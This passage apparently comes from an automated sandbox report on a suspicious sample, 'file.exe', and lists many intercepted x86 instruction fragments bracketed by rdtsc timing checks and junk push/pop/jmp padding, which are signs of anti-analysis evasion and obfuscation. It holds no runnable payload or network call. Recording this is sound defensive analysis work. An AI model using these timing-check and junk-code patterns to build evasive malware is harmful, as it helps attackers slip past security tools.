          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F52E7 second address: 9F52F1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C143Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F55B2 second address: 9F55D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F1FDD1C1206h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F55D1 second address: 9F55F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1449h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F55F2 second address: 9F5671 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F1FDD1C1213h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1FDD1C1215h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1FDD1C1214h 0x00000019 jmp 00007F1FDD1C1218h 0x0000001e popad 0x0000001f je 00007F1FDD1C1224h 0x00000025 jmp 00007F1FDD1C1218h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5671 second address: 9F5675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F591E second address: 9F5937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F1FDD1C1213h 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5AAD second address: 9F5AC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1FDD1C1444h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5AC9 second address: 9F5AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 jmp 00007F1FDD1C120Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5AEB second address: 9F5AF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5C4C second address: 9F5C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5C55 second address: 9F5C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1FDD1C1442h 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5C6F second address: 9F5C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F5DA9 second address: 9F5DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F61F0 second address: 9F61F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9FF434 second address: 9FF448 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C143Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A035FC second address: A03600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C45 second address: A05C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C49 second address: A05C5F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F1FDD1C1206h 0x00000010 jng 00007F1FDD1C1206h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05C5F second address: A05C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0580B second address: A05812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05812 second address: A05818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05818 second address: A05824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A05824 second address: A05828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0A136 second address: A0A13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0A13A second address: A0A167 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1FDD1C1449h 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007F1FDD1C1441h 0x0000000f pushad 0x00000010 jmp 00007F1FDD1C143Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0E4F0 second address: A0E4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0DF29 second address: A0DF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A140B3 second address: A140B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A140B7 second address: A140BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A140BD second address: A140C7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1FDD1C120Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A140C7 second address: A1410D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F1FDD1C1443h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007F1FDD1C1436h 0x00000019 jmp 00007F1FDD1C1447h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1289F second address: A128B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1FDD1C120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A128B4 second address: A128B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A128B8 second address: A128BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A128BC second address: A128C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A128C2 second address: A128C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A128C9 second address: A128D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1FDD1C1436h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12A21 second address: A12A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1206h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12E74 second address: A12E91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A12E91 second address: A12EBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1210h 0x00000007 jo 00007F1FDD1C1206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1FDD1C120Dh 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13040 second address: A13046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13046 second address: A1304A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1304A second address: A1305A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F1FDD1C143Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B4683 second address: 9B46B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jbe 00007F1FDD1C121Dh 0x00000012 jmp 00007F1FDD1C1217h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F1FDD1C1206h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B46B9 second address: 9B46BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13207 second address: A1320B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1320B second address: A13233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1FDD1C144Dh 0x0000000e jmp 00007F1FDD1C1447h 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A13D8E second address: A13DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F1FDD1C1218h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A197F3 second address: A197F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A197F7 second address: A19815 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 jmp 00007F1FDD1C120Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19815 second address: A19821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F1FDD1C1436h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19821 second address: A1982B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1FDD1C1206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A19AF3 second address: A19B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 push ecx 0x00000008 jmp 00007F1FDD1C143Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A345 second address: A1A349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A5EB second address: A1A5F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A8A7 second address: A1A8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A8AB second address: A1A8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1A8B3 second address: A1A8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1A8B9 second address: A1A8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AB85 second address: A1ABA7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1FDD1C1206h 0x00000008 jmp 00007F1FDD1C1218h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABA7 second address: A1ABB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1ABB1 second address: A1ABD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1218h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE92 second address: A1AE96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE96 second address: A1AE9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1AE9C second address: A1AEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B107 second address: A1B10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B10B second address: A1B10F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B10F second address: A1B11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F1FDD1C1206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B11F second address: A1B123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1B123 second address: A1B155 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1FDD1C1211h 0x0000000e popad 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3E3 second address: A1F3EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3EB second address: A1F3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3EF second address: A1F3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F3F3 second address: A1F3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F566 second address: A1F56C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F56C second address: A1F570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1F96B second address: A1F9B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1FDD1C1449h 0x0000000b je 00007F1FDD1C144Ah 0x00000011 jmp 00007F1FDD1C143Eh 0x00000016 jno 00007F1FDD1C1436h 0x0000001c popad 0x0000001d push ebx 0x0000001e jo 00007F1FDD1C143Eh 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D9D1 second address: A2D9DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F1FDD1C1206h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D9DB second address: A2DA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F1FDD1C1447h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A46D second address: 96A471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A471 second address: 96A49C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1442h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F1FDD1C143Fh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A49C second address: 96A4E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C1206h 0x00000008 jns 00007F1FDD1C1206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F1FDD1C1211h 0x00000017 jmp 00007F1FDD1C120Dh 0x0000001c pushad 0x0000001d jmp 00007F1FDD1C1214h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A4E3 second address: 96A4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA5C second address: A2BA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F1FDD1C1206h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F1FDD1C1219h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA94 second address: A2BA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BA98 second address: A2BAA8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1FDD1C1206h 0x00000008 jns 00007F1FDD1C1206h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BAA8 second address: A2BAC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1FDD1C1446h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BEAA second address: A2BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2BEAE second address: A2BEC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F1FDD1C1436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1FDD1C1436h 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C17A second address: A2C180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C180 second address: A2C184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C184 second address: A2C188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45A second address: A2C45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C45E second address: A2C462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C462 second address: A2C46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C46E second address: A2C472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C472 second address: A2C48C instructions: 0x00000000 rdtsc 0x00000002 je 00007F1FDD1C1436h 0x00000008 jmp 00007F1FDD1C143Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C48C second address: A2C4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1215h 0x00000009 pop ebx 0x0000000a popad 0x0000000b jg 00007F1FDD1C123Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1FDD1C1219h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C899 second address: A2C89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C89F second address: A2C8BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1217h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2C8BF second address: A2C8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B585 second address: A2B58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
